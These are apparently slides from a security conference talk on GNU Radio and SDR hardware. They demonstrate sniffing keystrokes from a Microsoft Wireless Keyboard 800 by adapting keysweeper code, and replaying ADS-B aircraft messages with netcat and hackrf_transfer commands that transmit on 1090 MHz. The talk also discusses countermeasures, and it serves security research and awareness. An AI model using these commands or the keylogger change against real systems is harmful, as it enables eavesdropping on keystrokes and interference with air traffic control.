We are in the IoT era. In this session, the function of GNURadio will be introduced with demonstration. GNURadio is a SDR (Software Defined Radio) tool to analyze wireless security such as Bluetooth LE. As an example of a SDR usage, I will demonstrate the replay attack for RF signal of ADS-B (Automatic Dependent Surveillance Broadcast) mounted on an aircraft and sniffer for wireless keyboards. Ideas of the counter measurement will also be discussed.
2. Agenda
Circumstance
In the IoT (Internet of Things) era
• key : Wireless Security
• To analyze wireless security,
SDR ( Software Defined Radio) technology is
effective.
Introduce GNU Radio, a SDR tool
Powerful tool to test wireless security
Easily available, work with inexpensive peripheral
hardware
Wireless security testing with attack
Attack#1 Key logging wireless keyboard
Attack#2 The replay attack for ADS-B2
3. Recent release of wireless security
Abuse/Falsification of software and firmware
Drone attack by malware and network
• http://www.slideshare.net/codeblue_jp/cb14-dongcheol-hongja/
RF signal level interception/injection
SPREAD SPECTRUM SATCOM HACKING: ATTACKING THE
GLOBALSTAR SIMPLEX DATA SERVICE
• https://www.blackhat.com/docs/us-15/materials/us-15-Moore-
Spread-Spectrum-Satcom-Hacking-Attacking-The-GlobalStar-
Simplex-Data-Service.pdf
Low-cost GPS simulator – GPS spoofing by SDR
• Lin Huang, Qing Yang, DEFCON23
• https://media.defcon.org/DEF%20CON%2023/DEF%20CON
%2023%20presentations/Lin%20Huang%20&%20Qing
%20Yang/DEFCON-23-Lin-Huang-Qing-Yang-GPS-Spoofing.pdf
3
4. In 2001, Eric Blossom in US started a free & open-source
software development toolkit about radio.
Multi-platform (Linux/FreeBSD/OSX/Windows)
Run on personal computer. cf. Many software radio
technology run on FPGA on exclusive hardware.
Create flow graph to use GUI on GNURadio Companion
flow graph -> XML file -> Python -> C++
License GPL ver3
http://gnuradio.org/redmine/projects/gnuradio/wiki
About GNURadio
4
5. GNURadio Component
Elements of the flow graph
SOURCE BLOCK SINK
Software
or
Hardware
Software
Python
C++
Software
or
Hardware
Input OutputProcessing
5
8. Sinks
Software
Hardware
PC Audio
Other peripheral hardware
• HackRF, BladeRF, USRP, ... etc.
SCOPE FFT Water Fall
Histogram Constellation Plot
Other Files
8
9. Peripheral hardware (e.g.)
RTL-SDR HackRF BladeRF USRP
Frequency
range [MHz] 24-1800 1-6000 300-3800 70-6000
A/D convert
bits 8 8 12 12
Band range
[MHz] 2.8 20 28 56
Transfer /
Receive RX Tx | Rx Tx & Rx Tx & Rx
Price $20 $300 $420 $675
9
11. VHF receiver
A VHF receiver composed of RTL-SDR and GNU Radio
RTL-SDR
11
12. ISM 2.4GHz band
WiFi/Bluetooth frequency allocation
http://www.digikey.com/es/articles/techzone/2013/jun/shaping-the-wireless-future-with-low-energy-applications-and-systems
12
14. Attack wireless devices
Survey attack target
Search FCC ID in FCC site
Photos, someone else put on view?
Overhaul by myself
Necessary information
RF chip data sheet
•Frequency band, Modulation, Transmission
speed, Data format
Observe and analyze the signal
14
16. How to monitoring and analyzing the signal
Receive radio waves
Check the signal : GNU Radio, SDR#
Write the received signal to file : GNU Radio, rtl_sdr
Analyze
Monitoring the waveform in detail : baudline
Cut the area where you need ( The area selected and
write to file ) : baudline
Demodulation: GNU Radio | in-house scripts
Decode / Parse / Decrypt
• Convert to bits (0/1) ( Hex dump is unreadable )
• Find the characterized bit pattern
16
17. Signal monitoring tool
Baudline
Baudline is the signal time-frequency
visualization and analysis support tool
Requirements
• Linux(x86_64,PowerPC)
• Mac OS X
• Solaris SPARC
Select the area
and write to file
http://www.baudline.com/index.html17
19. Attack demo #1
Keylogger for Microsoft wireless keyboard 800
At first, try to reproduce “keysweeper”(*1)
It can’t work the MS Wireless Keyboard 800
Japanese edition
Demonstrate process from investigate the
cause using the GNU Radio to work
(*1) https://github.com/samyk/keysweeper
19
20. Keylogger for Wireless Keyboard
27MH z band
It is easy to snoop because (in)secure
End of sale in the 2000s
2.4GHz band
Same as Bluetooth/WiFi frequency
Bluetooth specification is secure?
What about the proprietary specification
keyboard?
20
21. Relation Project
Travis Goodspeed, 2010
The GoodFET is an open-source JTAG adapter, loosely based
upon the TI MSP430 FET UIF and EZ430U boards
http://goodfet.sourceforge.net/
KeyKeriKi Project (CanSecWest 2010)
Developed some device with ARM Cortex MPU and radio module
which can keyboard sniffing and remote command execution.
http://www.remote-exploit.org/articles/keykeriki_v2_0__8211_2_4ghz/index.html
Keysweeper (January 2015)
Make efficient and systematize processes
• Focus on a part of device address fixed 0xCD
• Embedded in USB charger and logging to EEPROM
• Detect keyword and mobile module send SMS
• Forward keystroke to another device in real time ... etc.
https://github.com/samyk/keysweeper
21
22. Experiment on breadboard
Sniffer hardware
USB
control PC
Microsoft Wireless
Keyboard 800 Arduino nano
•Scan 2403-2480MHz by 1MHz step
•Inspect 1 byte (=0xCD) in device ID
•If next 2byte are (0x0A38 | 0x0A78),
stop scanning and start logging
about 1500 lines Arduino program
nRF24L01
・ 2.4GHz ISM band
・ GFSK modulation
・ 1Mbps or 2Mbps
22
23. Success ?
Radio setup
End radio setup
scan
Tuning to 2480
Potential keyboard: AA AA 5A A9 CD 27 55 49
Tuning to 2403
Tuning to 2404
Potential keyboard: E4 AA AA A5 CD 55 A5 5A
Tuning to 2405
Tuning to 2406
Tuning to 2407
Tuning to 2408
…………………
No !!
23
29. KeyKeriki Project results
・ Microsoft Wireless Keyboard 800’s device address is composed
of 5 byte start from 0xCD
・ Keystroke is encrypted by simple XOR operation using this device
address
http://www.remote-exploit.org/content/keykeriki_v2_cansec_v1.1.pdf
29
30. Get BIT sequence
bit = Vfm > 0 ? 0:1
111111111111001100010000000000100110111110111111111111111111111111
111111111110010101010101010010011001111100101000101101100111001000
000000001010011110000001110100000001010011100001110110100110001100
111010100111101110000010001110010100110011100111001110011100011110
111110100111000111111111111100110010000000000001111111011111111111
111101111111101111111111111111111111111111111001010101010101001001
100111110010100010110110011100100000000000101001111000000111010000
000101001110000111011010011000110011101010011110111000001000111001
010011001110101001110011100111000111101111101001110101111111111100
110000001000100010001111111111111111111111111011111111111111111111
101010101001011001111100101000101101100111001000000000001010011110
000001110100000001010011100001110110100110001100111010100111101110
000010001110
……….
find to “0x0A78 (0000101001111000)”
Packet control field 9 bit
Devie ID
Preamble 8bit + address 5 byte + packet control 9bit + payload
30
31. Device ID detection
{ P.A. } { [p0] p[1] [p2] [p3] [p4]}
AA A9 33 E5 16 CE
10101010 10101001 00110011 11100101 00010110
11001110
{PktCTL Bit} 0A 78 1D 01
010000000 00001010 01111000 00011101 00000001
{ payload .......
0100111000011101101001100011001110101001111011100……
// From keysweeper_mcu_src https://github.com/samyk/keysweeper
if (radio.available())
{
radio.read(&p, PKT_SIZE);
if (p[4] == 0xCD) // 0xCD -> 0xCE for Japanese KBD
{
sp("Potential keyboard: ");
DEVICE ID
31
34. Summary #1
Using GNU Radio, find the device address KEY
(0xCE) of the Microsoft Wireless Keyboard 800
Japanese edition
Change the device address KEY to 0xCE, then
monitor keylogger Behavior.
Don’t use wireless keyboard, when the operation
with sensitive information. Especially, warn against
using proprietary specification device.
Caution
Experiment in Japan, signal from nRF24L should be invalidated
• boolean shoutKeystrokes = true; -> false;
34
35. Attack demo #2
Replay attack for ADS-B(*1) mounted on
aircraft
Aviation is part of the critical infrastructure
ADS-B is next generation air traffic control
system
Attack demo played in Blackhat2012,
DEFCON20, ...etc.
Applying SDR technology, tried to replay
the attack
(*1)Automatic Dependent Surveillance–Broadcast
35
37. ADS-B overview
Because old radar’s positional accuracy was 1-2 NM, there was a need
to widen the service interval to ensure the safety of aircraft operation.
To keep up with aircraft increasing, new system is needed. ADS-B,
using GPS, to provide a highly accurate position information, has been
developed as next generation air traffic control system in 1980-1990.
Now, about 70 % of passenger plane have ADS-B
(Source http://www.flightradar24.com/how-it-works)
Required to equip until 2017 in Europe, until 2020 in the United States
Point at issue
No encryption
Broadcast with no authentication
Simple encoding and simple modulation scheme
37
38. Mechanism of ADS-B
ADS-B
Automatic Dependent Surveillance–Broadcast
Using broadcast datalink, Aircraft transmits own
location, speed, altitude, and so on obtained
from measuring system such as GPS.
Image http://www.enri.go.jp/news/osirase/pdf/e_navi10.pdf
38
GPS location
Broadcast
Datalink
Control Center Ground Receiving
Station
39. Papers related to ADS-B
About Vulnerability
Donald L. McCallie, Major, USAF (2011)
• http://apps.fcc.gov/ecfs/document/view.action?id=7021694523
Andrei Costin, Aurelien Francillon, BlackHat2012
• https://media.blackhat.com/bh-us-
12/Briefings/Costin/BH_US_12_Costin_Ghosts_In_Air_Slides.pdf
Brad render, DEFCON20 ( 2012 )
• http://korben.info/wp-content/uploads/defcon/SpeakerPresentations/Renderman/DEFCON-20-
RenderMan-Hackers-plus-Airplanes.pdf
Hugo Teso, CyCon2013 (2013)
• https://ccdcoe.org/cycon-2013.html
About Countermeasures
Martin Strohmeier, Ivan Martinovic 、 (2014)
• Detecting False-Data Injection Attacks on Air Traffic Control Protocols
• http://www.cs.ox.ac.uk/files/6604/wisec2014-abstract.pdf
Kyle D. Wesson,Brian L. Evans, and more. (2014)
• Can Cryptography Secure Next Generation Air Traffic Surveillance?
• https://radionavlab.ae.utexas.edu/images/stories/files/papers/adsb_for_submission.pdf
Seoung-Hyeon Lee , Yong-Kyun Kim, Deok-Gyu Lee, and more. (2014)
• Protection Method for Data Communication between ADS-BSensor and Next-Generation Air
Traffic Control Systems
• http://www.mdpi.com/2078-2489/5/4/622
39
41. How to receive ADS-B?
Receive the radio waves
USB stick for receiving overseas digital TV
It’s about 1000 JPY to 2000 JPY
Process the signal
and display
PC
•Windows, Mac, Linux
Smartphone, Tablet
41
44. ADS-B format
Format
Actual received I/Q signals
https://media.defcon.org/DEF%20CON%2020/DEF%20CON%2020%20slides/DEF%20CON%2020%20Hacking%20Conference
%20Presentation%20By%20RenderMan%20-%20Hacker%20and%20Airplanes%20No%20Good%20Can%20Come%20Of%20This
%20-%20Slides.m4v
44
46. Received ADS-B (e.g.)
*8d7583a5585b575a9ebc4bbb3f04;
CRC: 000000 (ok)
DF 17: ADS-B message.
Capability : 5 (Level 2+3+4 )
ICAO Address : 7583a5
Extended Squitter Type: 11
Extended Squitter Sub : 0
Extended Squitter Name: Airborne Position …….
F flag : odd
T flag : non-UTC
Altitude : 17125 feet
………….
Raw data in hex
Aircraft
location data,
...etc.
I/Q signal after A/D convert
Demodulation / Decode
Parse the data
46
47. Attack Vector
IP NetworkIP Network
ADS-B
Receiving
Station
ADS-B
Receiving
Station
ADS-B
Receiving
Station
ADS-B
Broadcast
GPS Satellite
Actor V2
V3
Image http://www.mlit.go.jp/koku/koku_fr14_000007.html
V1
47
48. Replay Attack (V1)
Intercepted raw data ( File name: xxxx.raw)
Inject the raw data via IP network
$cat xxxx.raw | nc target_IP target_PORT
※In reality, the adversary needs to find a way to get through the
authentication in order to connect to the target server.
*8d869210581fe3bf4350dfd62439;
*5da40455385715;
*8d86dca29914ee0f20f410ef2595;
*8d780c3c581db79c18a4b0ffc872;
*8d867f609914b993e8700ba91251;
*02a1839b9e229d;
*……………
48
49. Replay Attack (V2)
Create an ADS-B pulse signal file from the raw data
$cat xxxx.raw | ./adsb-pulsegen test_file.bin
Use the file to generate a RF signal modulated
$hackrf_transfer –f 1090MHz –s 2MHz –t test_file.bin –x 0
*8d869210581fe3bf4350dfd62439;
*5da40455385715;
*8d86dca29914ee0f20f410ef2595;
*8d780c3c581db79c18a4b0ffc872;
*8d867f609914b993e8700ba91251;
*02a1839b9e229d;
*0261819c1d1e5a;
……………
49
50. DEMO
Injection via IP network (V1)
Real-time interception of ADS-B signal and
display on map
Inject the raw data received in the past
Injection via RF channel (V2)
Generate an I/Q signal file from the received raw
data
Inject the RF signal modulated by the I/Q signal
50
53. Security of air traffic control?
Why doesn’t it get renewed?
Threat not being recognized
To preserve safety and
interoperability
International discussion
takes a long period of time
• Forming consensus
• Development
• Deployment
Image http://www.jatcaonline.com/SSR_system.JPG
https://upload.wikimedia.org/wikipedia/commons/f/fe/D-VOR_PEK.JPG
ASR/SSR
ILS ( glide slope / Localizer )
VOR/DME
53
54. Summary #2
Technically, an attack against ADS-B is extremely easy
Not only ADS-B but any air traffic control system that relies on radio
waves are vulnerable to jamming attacks.
Possible attack scenarios
Terrorists or nation state actors injects false flight paths or performs
jamming attacks to confuse the air traffic control as one of the ways to
accomplish an objective.
Is it hard to implement early countermeasures? ( Requires an
international consensus )
A mitigation plan such as detecting interception or using tracking
algorithms must be considered
Create an environment that enhances virtual trainings and incident
response plan
54
55. Conclusion
Due to the emerge of the software defined radio experiment
tool GNU Radio and the low cost RF related hardware, the
technical threshold to carry out an RF attack has been
lowered
The existing systems that relies on radio waves such as the
air traffic control system, has not been able to follow the
modernization which the commercial technology like WIFI or
smartphone has gone through
A fundamental countermeasure will require a long period of
time
Compensating the lack of countermeasure with operational
practice will require an enhanced incident response plan and
trainings
55